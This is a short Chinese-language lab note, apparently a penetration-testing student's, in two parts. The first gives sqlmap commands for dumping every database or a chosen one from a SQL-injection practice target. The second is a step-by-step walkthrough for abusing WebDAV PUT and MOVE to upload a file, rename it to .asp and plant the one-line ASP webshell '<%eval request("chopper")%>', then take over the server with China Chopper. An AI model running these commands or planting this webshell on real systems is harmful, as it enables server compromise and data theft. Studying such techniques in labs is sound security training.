2021-9-16
--续
六、脱库(ctrl+c退出)
脱数据库
--dump-all
sqlmap -u "http://106.52.39.144/Less-1/?id=1" --dump-all (脱所有数据库,动静太大,不能随便脱)
sqlmap -u "http://106.52.39.144/Less-1/?id=1" -D security --dump (一般用这个)
七、调线程
--thread 调线程 范围1-10
sqlmap -u "http://106.52.39.144/Less-1/?id=1" -D security --dump --thread 10
--batch 不会再跳出询问选择 ,按照默认选择进行选择
sqlmap -u "http://106.52.39.144/Less-1/?id=1" --dump-all --thread 10 --batch
实验查网页漏洞
一、所用信息
网站IP:192.168.1.62
病毒:一句话木马病毒(<%eval request("chopper")%>)
菊花马(文件)
Burpsuit所用命令:OPTION(看)
PUT (传)
MOVE (改)
Destination:http://192.168.1.62/1.asp
所用工具:burpsuit、菜刀
二、实验步骤
1、先将192.168.1.62在burpsuit中进行(proxy)抓包——右击-REPEATER-RESPONSE
2、用(options)命令看允许的命令。将第一行前缀改成OPTIONS-看里面允许了什么-右面那一栏-倒数二三行
3、再用put命令上传文件。
改的命令为:(1)、将txt文件的文件名改成xjj
- 、将Destination:http://192.168.1.62/1.asp插入user命令下面
- 、在最后一行空一行加入一句话木马(密码可以自己设)
- MOVE命令来改txt命令的后缀名
- 将DISTINATION后面的域名复制下来-添加进菜刀并输入密码-双击-拖入菊花马程序
6、再次进入网站-输入密码-即成功